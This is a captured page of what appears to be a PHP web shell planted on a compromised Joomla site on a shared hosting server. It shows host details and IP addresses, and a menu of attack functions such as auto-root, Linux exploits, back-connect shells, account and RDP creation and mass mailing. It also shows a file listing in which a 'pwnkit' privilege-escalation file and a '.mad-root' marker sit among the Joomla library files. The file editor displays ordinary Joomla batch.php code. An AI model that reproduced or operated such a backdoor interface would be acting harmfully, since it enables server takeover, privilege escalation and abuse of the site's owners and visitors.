Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
cms /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access.php
8.56
KB
-rw-r--r--
actionsdropdown.php
5.59
KB
-rw-r--r--
batch.php
5.77
KB
-rw-r--r--
behavior.php
26.19
KB
-rw-r--r--
bootstrap.php
30.89
KB
-rw-r--r--
category.php
4.43
KB
-rw-r--r--
content.php
1.12
KB
-rw-r--r--
contentlanguage.php
1.53
KB
-rw-r--r--
date.php
1.93
KB
-rw-r--r--
dropdown.php
8.79
KB
-rw-r--r--
email.php
3.32
KB
-rw-r--r--
form.php
736
B
-rw-r--r--
formbehavior.php
4.41
KB
-rw-r--r--
grid.php
9.85
KB
-rw-r--r--
html.php
31.3
KB
-rw-r--r--
icons.php
1.52
KB
-rw-r--r--
jgrid.php
16.15
KB
-rw-r--r--
jquery.php
2.95
KB
-rw-r--r--
links.php
2.51
KB
-rw-r--r--
list.php
6.65
KB
-rw-r--r--
menu.php
8.11
KB
-rw-r--r--
number.php
1.52
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rules.php
7.89
KB
-rw-r--r--
searchtools.php
4.09
KB
-rw-r--r--
select.php
27.35
KB
-rw-r--r--
sidebar.php
3.14
KB
-rw-r--r--
sliders.php
3.83
KB
-rw-r--r--
sortablelist.php
3.16
KB
-rw-r--r--
string.php
8.93
KB
-rw-r--r--
tabs.php
2.63
KB
-rw-r--r--
tag.php
6.72
KB
-rw-r--r--
tel.php
2.15
KB
-rw-r--r--
user.php
1.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : batch.php
<?php /** * @package Joomla.Libraries * @subpackage HTML * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * Extended Utility class for batch processing widgets. * * @since 1.7 */ abstract class JHtmlBatch { /** * Display a batch widget for the access level selector. * * @return string The necessary HTML for the widget. * * @since 1.7 */ public static function access() { JHtml::_('bootstrap.tooltip', '.modalTooltip', array('container' => '.modal-body')); // Create the batch selector to change an access level on a selection list. return '<label id="batch-access-lbl" for="batch-access" class="modalTooltip" ' . 'title="' . JHtml::tooltipText('JLIB_HTML_BATCH_ACCESS_LABEL', 'JLIB_HTML_BATCH_ACCESS_LABEL_DESC') . '">' . JText::_('JLIB_HTML_BATCH_ACCESS_LABEL') . '</label>' . JHtml::_( 'access.assetgrouplist', 'batch[assetgroup_id]', '', 'class="inputbox"', array( 'title' => JText::_('JLIB_HTML_BATCH_NOCHANGE'), 'id' => 'batch-access' ) ); } /** * Displays a batch widget for moving or copying items. * * @param string $extension The extension that owns the category. * * @return string The necessary HTML for the widget. * * @since 1.7 */ public static function item($extension) { // Create the copy/move options. $options = array( JHtml::_('select.option', 'c', JText::_('JLIB_HTML_BATCH_COPY')), JHtml::_('select.option', 'm', JText::_('JLIB_HTML_BATCH_MOVE')) ); // Create the batch selector to change select the category by which to move or copy. return '<label id="batch-choose-action-lbl" for="batch-choose-action">' . JText::_('JLIB_HTML_BATCH_MENU_LABEL') . '</label>' . '<div id="batch-choose-action" class="control-group">' . '<select name="batch[category_id]" class="inputbox" id="batch-category-id">' . '<option value="">' . JText::_('JLIB_HTML_BATCH_NO_CATEGORY') . '</option>' . JHtml::_('select.options', JHtml::_('category.options', $extension)) . '</select>' . '</div>' . '<div id="batch-copy-move" class="control-group radio">' . JText::_('JLIB_HTML_BATCH_MOVE_QUESTION') . JHtml::_('select.radiolist', $options, 'batch[move_copy]', '', 'value', 'text', 'm') . '</div>'; } /** * Display a batch widget for the language selector. * * @return string The necessary HTML for the widget. * * @since 2.5 */ public static function language() { JHtml::_('bootstrap.tooltip', '.modalTooltip', array('container' => '.modal-body')); JFactory::getDocument()->addScriptDeclaration( ' jQuery(document).ready(function($){ if ($("#batch-category-id").length){var batchSelector = $("#batch-category-id");} if ($("#batch-menu-id").length){var batchSelector = $("#batch-menu-id");} if ($("#batch-position-id").length){var batchSelector = $("#batch-position-id");} if ($("#batch-copy-move").length) { $("#batch-copy-move").hide(); batchSelector.on("change", function(){ if (batchSelector.val() != 0 || batchSelector.val() != "") { $("#batch-copy-move").show(); } else { $("#batch-copy-move").hide(); } }); } }); ' ); // Create the batch selector to change the language on a selection list. return '<label id="batch-language-lbl" for="batch-language-id" class="modalTooltip"' . ' title="' . JHtml::tooltipText('JLIB_HTML_BATCH_LANGUAGE_LABEL', 'JLIB_HTML_BATCH_LANGUAGE_LABEL_DESC') . '">' . JText::_('JLIB_HTML_BATCH_LANGUAGE_LABEL') . '</label>' . '<select name="batch[language_id]" class="inputbox" id="batch-language-id">' . '<option value="">' . JText::_('JLIB_HTML_BATCH_LANGUAGE_NOCHANGE') . '</option>' . JHtml::_('select.options', JHtml::_('contentlanguage.existing', true, true), 'value', 'text') . '</select>'; } /** * Display a batch widget for the user selector. * * @param boolean $noUser Choose to display a "no user" option * * @return string The necessary HTML for the widget. * * @since 2.5 */ public static function user($noUser = true) { JHtml::_('bootstrap.tooltip', '.modalTooltip', array('container' => '.modal-body')); $optionNo = ''; if ($noUser) { $optionNo = '<option value="0">' . JText::_('JLIB_HTML_BATCH_USER_NOUSER') . '</option>'; } // Create the batch selector to select a user on a selection list. return '<label id="batch-user-lbl" for="batch-user" class="modalTooltip"' . ' title="' . JHtml::tooltipText('JLIB_HTML_BATCH_USER_LABEL', 'JLIB_HTML_BATCH_USER_LABEL_DESC') . '">' . JText::_('JLIB_HTML_BATCH_USER_LABEL') . '</label>' . '<select name="batch[user_id]" class="inputbox" id="batch-user-id">' . '<option value="">' . JText::_('JLIB_HTML_BATCH_USER_NOCHANGE') . '</option>' . $optionNo . JHtml::_('select.options', JHtml::_('user.userlist'), 'value', 'text') . '</select>'; } /** * Display a batch widget for the tag selector. * * @return string The necessary HTML for the widget. * * @since 3.1 */ public static function tag() { JHtml::_('bootstrap.tooltip', '.modalTooltip', array('container' => '.modal-body')); // Create the batch selector to tag items on a selection list. return '<label id="batch-tag-lbl" for="batch-tag-id" class="modalTooltip"' . ' title="' . JHtml::tooltipText('JLIB_HTML_BATCH_TAG_LABEL', 'JLIB_HTML_BATCH_TAG_LABEL_DESC') . '">' . JText::_('JLIB_HTML_BATCH_TAG_LABEL') . '</label>' . '<select name="batch[tag]" class="inputbox" id="batch-tag-id">' . '<option value="">' . JText::_('JLIB_HTML_BATCH_TAG_NOCHANGE') . '</option>' . JHtml::_('select.options', JHtml::_('tag.tags', array('filter.published' => array(1))), 'value', 'text') . '</select>'; } }
Close